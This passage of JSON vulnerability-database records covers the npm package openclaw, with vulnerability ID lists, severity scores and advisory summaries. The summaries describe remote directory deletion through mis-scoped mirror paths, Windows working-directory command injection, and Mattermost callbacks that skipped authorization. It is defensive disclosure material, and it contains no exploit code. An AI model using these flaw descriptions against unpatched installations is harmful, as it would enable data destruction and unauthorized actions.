xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["GHSA-6rmx-gvvg-vh6j"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qyyn-bw9t-r7c4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89402?format=json","vulnerability_id":"VCID-r5bw-c2py-9udf","summary":"OpenClaw: OpenShell mirror mode could delete arbitrary remote directories when roots were mis-scoped\n## Summary\n\nBefore OpenClaw 2026.4.2, the OpenShell mirror backend accepted arbitrary absolute `remoteWorkspaceDir` and `remoteAgentWorkspaceDir` values. In mirror mode, those paths were then used as the target of remote cleanup and overwrite operations.\n\n## Impact\n\nIf an attacker could influence those OpenShell config values, mirror sync could delete the contents of an unintended remote directory and replace them with uploaded workspace data. This was a destructive remote-path bug in the mirror-sync path.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `b21c9840c2e38f4bb338d031511b479d5f07ca25` — constrain OpenShell mirror sync roots\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @jufeng123768 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41383","reference_id":"","reference_type":"","scores":[{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.1855","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18515","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18553","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41383"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/b21c9840c2e38f4bb338d031511b479d5f07ca25","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:49:59Z/"}],"url":"https://github.com/openclaw/openclaw/commit/b21c9840c2e38f4bb338d031511b479d5f07ca25"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m34q-h93w-vg5x","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:49:59Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m34q-h93w-vg5x"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41383","reference_id":"CVE-2026-41383","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41383"},{"reference_url":"https://github.com/advisories/GHSA-m34q-h93w-vg5x","reference_id":"GHSA-m34q-h93w-vg5x","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m34q-h93w-vg5x"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-remote-directory-deletion-via-mis-scoped-mirror-mode-paths","reference_id":"openclaw-arbitrary-remote-directory-deletion-via-mis-scoped-mirror-mode-paths","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:49:59Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-remote-directory-deletion-via-mis-scoped-mirror-mode-paths"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41383","GHSA-m34q-h93w-vg5x"],"risk_score":3.6,"exploitability":"0.5","weighted_severity":"7.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-r5bw-c2py-9udf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91847?format=json","vulnerability_id":"VCID-r5dj-qv5d-sqff","summary":"Duplicate Advisory: ACPX Windows wrapper shell fallback allowed cwd injection in specific paths\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-6f6j-wx9w-ff4j. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions 2026.2.26 prior to 2026.3.1 on Windows contain a current working directory injection vulnerability in wrapper resolution for .cmd/.bat files that allows attackers to influence execution behavior through cwd manipulation. Remote attackers can exploit improper shell execution fallback mechanisms to achieve command execution integrity loss by controlling the current working directory during wrapper resolution.","references":[{"reference_url":"https://www.vulncheck.com/advisories/openclaw-current-working-directory-injection-via-windows-wrapper-resolution-fallback","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-current-working-directory-injection-via-windows-wrapper-resolution-fallback"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31999","reference_id":"CVE-2026-31999","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31999"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6f6j-wx9w-ff4j","reference_id":"GHSA-6f6j-wx9w-ff4j","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6f6j-wx9w-ff4j"},{"reference_url":"https://github.com/advisories/GHSA-h36m-2vh5-x699","reference_id":"GHSA-h36m-2vh5-x699","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h36m-2vh5-x699"}],"fixed_packages":[],"aliases":["GHSA-h36m-2vh5-x699"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-r5dj-qv5d-sqff"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91808?format=json","vulnerability_id":"VCID-r9j7-ya3h-cbda","summary":"OpenClaw: Mattermost callback dispatch allowed non-allowlisted sender actions\n## Summary\nMattermost interactive callback dispatch could run action handlers before normal sender authorization checks completed.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/mattermost/src/mattermost/interactions.ts now requires callback authorization before dispatching actions.\n- extensions/mattermost/src/mattermost/monitor.ts routes callback authorization through the same sender and allowlist policy used for normal ingress.\n\nOpenClaw thanks @zpbrent for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35652","reference_id":"","reference_type":"","scores":[{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.19797","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.19749","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.19792","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35652"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:54:51Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:54:51Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8883-9w57-vwv6","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:54:51Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8883-9w57-vwv6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35652","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35652"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthorized-action-execution-via-callback-dispatch","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:54:51Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthorized-action-execution-via-callback-dispatch"},{"reference_url":"https://github.com/advisories/GHSA-8883-9w57-vwv6","reference_id":"GHSA-8883-9w57-vwv6","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8883-9w57-vwv6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vul